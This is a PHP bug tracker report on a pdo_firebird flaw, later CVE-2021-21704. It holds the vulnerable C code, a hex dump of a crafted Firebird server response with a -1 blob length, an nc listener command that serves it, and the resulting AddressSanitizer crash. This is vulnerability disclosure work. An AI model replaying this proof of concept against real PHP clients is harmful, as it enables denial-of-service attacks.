|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2018-06-20 04:09 UTC] stas@php.net
-Assigned To:
+Assigned To: lwe
[2018-06-28 08:31 UTC] trichimtrich at gmail dot com
[2021-04-30 14:23 UTC] cmb@php.net
-Status: Assigned
+Status: Verified
-Assigned To: lwe
+Assigned To: cmb
[2021-05-05 10:54 UTC] cmb@php.net
-Assigned To: cmb
+Assigned To: stas
[2021-05-05 10:54 UTC] cmb@php.net
[2021-06-21 04:54 UTC] stas@php.net
[2021-06-21 05:10 UTC] stas@php.net
-CVE-ID:
+CVE-ID: 2021-21704
[2021-06-21 06:22 UTC] stas@php.net
-Private report: No
+Private report: Yes
[2021-06-28 04:41 UTC] git@php.net
[2021-06-28 04:41 UTC] git@php.net
-Status: Verified
+Status: Closed
[2022-06-07 15:09 UTC] git@php.net
|
|||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Sun Oct 26 15:00:01 2025 UTC |
Description: ------------ A bug in pdo_firebase module allows a malicious firebase server or man-in-the-middle attacker to crash PHP. The length in response can set to -1 to make PHP crash. Vulnerable code in: \php-src\ext\pdo_firebird\firebird_statement.c:281 281: item_len = (unsigned short) isc_vax_integer(&bl_info[i], 2); 282: 283: if (item == isc_info_blob_total_length) { 284: *len = isc_vax_integer(&bl_info[i+2], item_len); 285: break; 286: } 287: i += item_len+2; 288: } 289: 290: /* we've found the blob's length, now fetch! */ 291: 292: if (*len) { 293: zend_ulong cur_len; 294: unsigned short seg_len; 295: ISC_STATUS stat; 296: 297: *ptr = S->fetch_buf[colno] = erealloc(*ptr, *len+1); 298: 299: for (cur_len = stat = 0; (!stat || stat == isc_segment) && cur_len < *len; cur_len += seg_len) { 300: 301: unsigned short chunk_size = (*len-cur_len) > USHRT_MAX ? USHRT_MAX 302: : (unsigned short)(*len-cur_len); 303: 304: stat = isc_get_segment(H->isc_status, &blobh, &seg_len, chunk_size, &(*ptr)[cur_len]); 305: } 306: 307: (*ptr)[*len++] = '\0'; $ ./php --version PHP 7.3.0-dev (cli) (built: Jun 9 2018 04:47:18) ( NTS ) Copyright (c) 1997-2018 The PHP Group Zend Engine v3.3.0-dev, Copyright (c) 1998-2018 Zend Technologies Test script: --------------- $ xxd stmt_blob.bin 00000000: 0000 005e ffff 800f 0000 0001 0000 0005 ...^............ 00000010: 0000 0000 0000 000b 4c65 6761 6379 5f41 ........Legacy_A 00000020: 7574 6800 0000 0000 0000 0000 0000 005c uth............\ 00000030: 0000 0000 0000 000b 4c65 6761 6379 5f41 ........Legacy_A 00000040: 7574 6800 0000 0000 0000 0000 0000 0009 uth............. 00000050: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00000060: 0000 0001 0000 0000 0000 0000 0000 0009 ................ 00000070: 0000 0001 0000 0000 0000 0000 0000 0000 ................ 00000080: 0000 0001 0000 0000 0000 0000 0000 0009 ................ 00000090: 0000 0002 0000 0000 0000 0000 0000 0000 ................ 000000a0: 0000 0001 0000 0000 0000 0000 0000 0009 ................ 000000b0: 0000 0004 0000 0000 0000 0000 0000 00a1 ................ 000000c0: 1504 0001 0000 001b 0400 0300 0000 0507 ................ 000000d0: 0400 0000 0000 0407 0400 0200 0000 0904 ................ 000000e0: 0001 0000 000b 0400 c101 0000 0c04 0000 ................ 000000f0: 0000 000d 0400 0000 0000 0e04 0032 0000 .............2.. 00000100: 0010 0300 4141 4111 0400 5445 5354 1206 ....AAA...TEST.. 00000110: 0053 5953 4442 4113 0300 4141 4108 0904 .SYSDBA...AAA... 00000120: 0002 0000 000b 0400 0902 0000 0c04 0000 ................ 00000130: 0000 000d 0400 0000 0000 0e04 0008 0000 ................ 00000140: 0010 0400 4242 4242 1104 0054 4553 5412 ....BBBB...TEST. 00000150: 0600 5359 5344 4241 1304 0042 4242 4208 ..SYSDBA...BBBB. 00000160: 0100 0000 0000 0001 0000 0000 0000 0000 ................ 00000170: 0000 0009 0000 0001 0000 0000 0000 0000 ................ 00000180: 0000 0000 0000 0001 0000 0000 0000 0000 ................ 00000190: 0000 0009 0000 0000 0000 0000 0000 0000 ................ 000001a0: 0000 0000 0000 0001 0000 0000 0000 0000 ................ 000001b0: 0000 0042 0000 0000 0000 0001 0000 0000 ...B............ 000001c0: 0000 0004 6869 6869 0000 008b 0000 0000 ....hihi........ 000001d0: 0000 0042 0000 0000 0000 0001 0000 0000 ...B............ 000001e0: 0000 0005 6869 6869 3200 0000 0000 008b ....hihi2....... 000001f0: 0000 0001 0000 0042 0000 0000 0000 0001 .......B........ 00000200: 0000 0000 0000 0005 6869 6869 3200 0000 ........hihi2... 00000210: 0000 008b 0000 0002 0000 0042 0000 0000 ...........B.... 00000220: 0000 0001 0000 0000 0000 0005 6869 6869 ............hihi 00000230: 3200 0000 0000 008b 0000 0003 0000 0042 2..............B 00000240: 0000 0064 0000 0000 0000 0009 0000 0003 ...d............ 00000250: 0000 0000 0000 0000 0000 0000 0000 0001 ................ 00000260: 0000 0000 0000 0000 0000 0009 0000 0003 ................ 00000270: 0000 0000 0000 0000 0000 0008 0604 00ff ................ 00000280: ffff ff01 0000 0001 0000 0000 0000 0000 ................ 00000290: 0000 0009 0000 0002 0000 0000 0000 0000 ................ 000002a0: 0000 0005 0300 3132 3300 0000 0000 0001 ......123....... 000002b0: 0000 0000 0000 0000 0000 0009 0000 0000 ................ 000002c0: 0000 0000 0000 0000 0000 0000 0000 0001 ................ 000002d0: 0000 0000 0000 0000 0000 0009 0000 0002 ................ 000002e0: 0000 0000 0000 0000 0000 0000 0000 0001 ................ 000002f0: 0000 0000 0000 0000 0000 0009 ffff ffff ................ 00000300: 0000 0000 0000 0000 0000 0000 0000 0001 ................ 00000310: 0000 0000 0000 0000 0000 0009 0000 0000 ................ 00000320: 0000 0000 0000 0000 0000 0000 0000 0001 ................ 00000330: 0000 0000 0000 0000 0000 0009 0000 0000 ................ 00000340: 0000 0000 0000 0000 0000 0000 0000 0001 ................ 00000350: 0000 0000 0000 0000 ........ $ nc -lvp 3050 < stmt_blob.bin $ cat fire_stmt_blob.php <?php $dsn = 'firebird:dbname=localhost:employee;charset=utf8;'; $username = 'SYSDBA'; $password = 'masterkey'; $dbh = new PDO($dsn, $username, $password, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]); $sql = "select * from test"; $query = $dbh->prepare($sql); $query->execute(); var_dump($query->fetch()); ?> Expected result: ---------------- No crash Actual result: -------------- $ ./php fire_stmt_blob.php ================================================================= ==5574==ERROR: AddressSanitizer: negative-size-param: (size=-1) #0 0x4ce057 in __asan_memcpy /scratch/llvm/clang-4/xenial/final/llvm.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:453:3 #1 0xcd44b1 in fetch_value (/mnt/hgfs/share/htdocs/php+0xcd44b1) #2 0xccd658 in do_fetch (/mnt/hgfs/share/htdocs/php+0xccd658) #3 0xcc605c in zim_PDOStatement_fetch (/mnt/hgfs/share/htdocs/php+0xcc605c) #4 0x12e2d9f in ZEND_DO_FCALL_SPEC_RETVAL_USED_HANDLER (/mnt/hgfs/share/htdocs/php+0x12e2d9f) #5 0x1212bcf in execute_ex (/mnt/hgfs/share/htdocs/php+0x1212bcf) #6 0x121320b in zend_execute (/mnt/hgfs/share/htdocs/php+0x121320b) #7 0x11175c0 in zend_execute_scripts (/mnt/hgfs/share/htdocs/php+0x11175c0) #8 0xfa4878 in php_execute_script (/mnt/hgfs/share/htdocs/php+0xfa4878) #9 0x1412cc4 in do_cli (/mnt/hgfs/share/htdocs/php+0x1412cc4) #10 0x1410e67 in main (/mnt/hgfs/share/htdocs/php+0x1410e67) #11 0x7f05cd17382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #12 0x43d878 in _start (/mnt/hgfs/share/htdocs/php+0x43d878) Address 0x7f05c7a87010 is a wild pointer. SUMMARY: AddressSanitizer: negative-size-param /scratch/llvm/clang-4/xenial/final/llvm.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:453:3 in __asan_memcpy ==5574==ABORTING